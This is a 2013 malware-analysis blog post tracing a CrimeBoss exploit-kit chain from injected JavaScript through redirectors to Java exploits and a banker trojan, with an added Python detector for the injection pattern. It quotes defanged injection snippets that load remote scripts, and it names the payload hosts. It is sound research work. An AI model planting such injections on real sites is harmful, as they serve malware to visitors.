Sunday, January 27, 2013

Hulk teams up with the Malware Crusaders to smash The CrimeBoss! (infector abrahamspath.org.uk//cb.php)

Background

This post was written entirely by one of our dedicated friends, @Hulk_Crusader, as the success story of a collaboration in fighting the malware infector CrimeBoss. Thanks to Hulk for the hard work of contributing his writing to our blog! Some of the analysis is still ongoing, so details will be added regularly.
On a cold January night we find The Hulk passing time surfing the internet when he encounters what appears to be a CrimeBoss Exploit Kit JavaScript injection on editorialconecta[.]com: Why can't puny malware just leave Hulk alone????!!! The script on abrahamspath.org.uk/cb.php checks if Java is enabled (slightly sanitized with <):
if(navigator.javaEnabled())
    {
    document.write('<script src="h00p://abrahamspath,org.uk//cb.php?action=jv&h=750139265"></script>');
    }
If Java is enabled you are sent via a 302 redirect to
boyssuitsonline,com/jex/index.php?setup=d
where again a check for Java is made (slightly sanitized with <):
if(navigator.javaEnabled())
    {
    document.write('<sc' + 'ri' + 'pt src="h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 + (Math.random()*999999 + 1)) + '" type="text/javascript" charset="iso-8859-1"></sc' + 'ri' + 'pt>');
    }
Finally the victim is presented with the actual landing page; a landing page sample is here -->>[PASTEBIN]. The landing page again checks if Java is enabled.
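To hunt for this injection pattern on a site you defend, here is an added example (not part of the original post or of MalwareMustDie's tooling) that scans page source for the CrimeBoss gate described above: a navigator.javaEnabled() check immediately followed by a document.write() of an external script tag, including the '<sc' + 'ri' + 'pt' split used by the redirector. The sample page and its hosts (infector.example, redirector.example) are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Joins split JS string literals ('<sc' + 'ri' + 'pt' -> '<script') so a tag
# broken across quotes cannot dodge a plain text match.
_CONCAT = re.compile(r"""(['"])\s*\+\s*\1""")
_GATE = re.compile(r"navigator\.javaEnabled\(\)")
_WRITE = re.compile(r"""document\.write\(\s*['"](?P<body>.*?)['"]\s*\)""", re.S)
_SRC = re.compile(r"""<script[^>]*\bsrc\s*=\s*["']?([^"'>\s]+)""", re.I)

def normalize_js(src: str) -> str:
    """Undo trivial string splitting and collapse whitespace before matching."""
    return re.sub(r"\s+", " ", _CONCAT.sub("", src))

def find_java_gated_injections(html: str, window: int = 300) -> dict:
    """Report external <script src> URLs that are document.write()-n only
    after a navigator.javaEnabled() check (the CrimeBoss gate)."""
    text = normalize_js(html)
    hits, prev_end = [], 0
    for m in _WRITE.finditer(text):
        # The gate must sit between the previous write and this one.
        gated = _GATE.search(text, max(prev_end, m.start() - window), m.start())
        prev_end = m.end()
        if not gated:
            continue
        for url in _SRC.findall(m.group("body")):
            u = urlparse(url)
            hits.append({"host": u.hostname, "path": u.path, "query": u.query})
    return {"hits": hits, "split_script_tag": bool(_CONCAT.search(html))}

# Constructed sample page modelled on the two injected snippets quoted in the
# post; the hosts are placeholders, not the real infector/redirector names.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<script>
if(navigator.javaEnabled())
    {
    document.write('<script src="http://infector.example//cb.php?action=jv&h=750139265"></script>'); }
</script>
<script>
if(navigator.javaEnabled())
  {
    document.write('<sc' + 'ri' + 'pt src="http://redirector.example/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 + (Math.random()*999999 + 1)) + '" type="text/javascript" charset="iso-8859-1"></sc' + 'ri' + 'pt>');
  }
</script>
<script>document.write('<p>benign: no Java gate here</p>');</script>
</body></html>"""

if __name__ == "__main__":
    for hit in find_java_gated_injections(SAMPLE_PAGE)["hits"]:
        print("Java-gated script injection ->", hit)
```

The ungated document.write() in the sample is deliberately left unreported, so the scanner flags the gate-plus-payload combination rather than every dynamic write on a page.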

[NEW] Analysis of Landing Page & Jars exploit used

I analyzed how the exploit worked and noted it down. It is a bit long, so I wrote it in a separate post -->>[HERE]. What is it with these moronz?? A malware PE binary, rh.exe, is downloaded from patuamusic.com,br/app/ if any of the Java applets successfully exploits the victim. See: VirusTotal analysis -->>[HERE], malwr.com analysis -->>[HERE]. Network analysis shows a GET request for Instal.teaz from sonhodoseu.dominiotemporario,com/fugi/. This is actually another executable and appears to be a banker trojan. See: VirusTotal analysis -->>[HERE], malwr.com analysis -->>[HERE]

Infection Scheme

Below we added the infection scheme graph: RRRRAAAAAAARGGHHHHH!!! The Hulk and the Malware Crusaders smash the evil CrimeBoss Kit, but is this the last we've seen of this villain?
Only time will tell. But bad guyz beware: The Hulk and The Malware Crusaders are always looking for you, and you will never know when we decide to smash you!!


*) abrahamspath.org.uk, boyssuitsonline.com, patuamusic.com.br and sonhodoseu.dominiotemporario.com are victimized (compromised) sites, in some cases also abused to host the infectious code that spreads malware to visitors.
PoC is as per the screenshots below, and so many other infections:

Research, Sources & Samples

Samples, as per the sample picture above, can be downloaded here -->>[MEDIAFIRE]. Recent infection URLs of this exploit kit are here -->>[HERE]. Similar analysis in Japanese --->>[HERE]. The regex to search for the infection hint: Written by: @Hulk_Crusader (main) & @unixfreaxjp (reference, analysis)
#MalwareMustDie!

6 comments:

  1. Excellent post, Hulkster! Great job!

  2. I have a small question: while we were checking the exploit kit (even though Java was enabled), we were not able to see the landing page or the jar file. Please let us know what we are missing.

    Thanks,

    Replies
    1. It is not merely Java as a parameter that needs to be achieved; the route of following the infection scheme from the infector > redirector > etc. is also important. Have I mentioned in the previous posts that the usage of a real IP address (not a proxy) also matters? Furthermore, many retries will cause you to be blocked or forwarded by the redirector; in the end, you get one shot to try, so prepare every requirement needed beforehand. I hope these tips help.

  3. Chrome says content from abrahamspath.org.uk has been inserted on my local nonprofit center for autism's webpage. What should I tell them to do?

    Replies
    1. I am sorry I don't understand the question, could you please rephrase it?
